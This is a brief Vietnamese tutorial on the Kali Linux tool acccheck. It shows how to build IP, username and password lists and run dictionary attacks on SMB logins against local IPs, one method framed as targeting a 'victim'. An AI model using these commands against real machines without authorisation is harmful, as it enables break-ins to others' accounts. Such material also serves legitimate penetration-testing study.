Acccheck Kali linux - Tool kiểm list danh sách password

     
     Acccheck là công cụ được thiết kế như một cuộc  tấn công bằng mật khẩu từ danh sách các từ điển có sẵn nhằm mục đích xác thực cửa sổ thông qua giao thức SMB. Nó thực hiên theo một kịch bản có sẵn là bộ từ điển user / password vào 'smbclient' nhị phân và xuất ra kết quả trong quá trình kiểm tra.


Acccheck


Cú pháp - Có 2 cách :

      Cách 1: Scan với thư viện có sẵn hoặc tạo thư viên, tạo file ListIP.txt, username.txt, password.txt
                 Example :  root@bad:~# touch ListIP.txt
                                 root@bad:~#  nano ListIP.txt nhập vào file IP : 192.168.1.12 , 192.168.1.45...
                                 root@bad:~#  touch username.txt
                                 root@bad:~# nano username.txt nhập vào file administrator admin phamquang
                                 root@bad:~#  touch password.txt
                                 root@bad:~# nano password.txt nhập và file 123 abc password ....
              Run : acccheck -T(T hoa để hiểu nhập tên file) ListIP.txt -u username.txt -p password.txt
              Acccheck sẽ tự động scan danh sách từ các file từ điển tương ứng để xác thực thông tin đúng hay không.

Cách 2 : Dự đoán thông tin nạn nhân, cách này đoán nạn nhân sẽ sử dụng IP 192.168.1.107 và có user administrator hoặc admin hoặc phamquangloc ... Từ đây sẽ nhập thông tin trực tiếp.
               Run : root@bad:~# acccheck -t 192.168.1.107 u- administrator -p password.txt


Kết quả chạy AcccheckNhãn: